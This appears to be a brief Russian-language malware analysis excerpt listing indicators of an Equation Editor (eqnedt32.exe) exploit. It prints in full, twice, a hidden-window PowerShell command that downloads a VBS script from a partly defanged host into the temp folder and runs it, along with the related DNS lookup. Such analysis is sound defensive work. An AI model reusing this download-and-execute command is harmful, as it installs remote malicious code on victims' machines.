Техническая информация
- http://go##andi.us/bbb.vbs как $ol
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$OL=$env:temp+'\Name.vbs'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/bbb.vbs', $OL);(New-Object -com Shell.Application).ShellExecute( $OL);}catch{}"
- http://go##andi.us/bbb.vbs
- DNS ASK go##andi.us
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$OL=$env:temp+'\Name.vbs'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/bbb.vbs', $OL);(New-Object -com Shell.Application).ShellExecute( $OL);}catch{}"' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding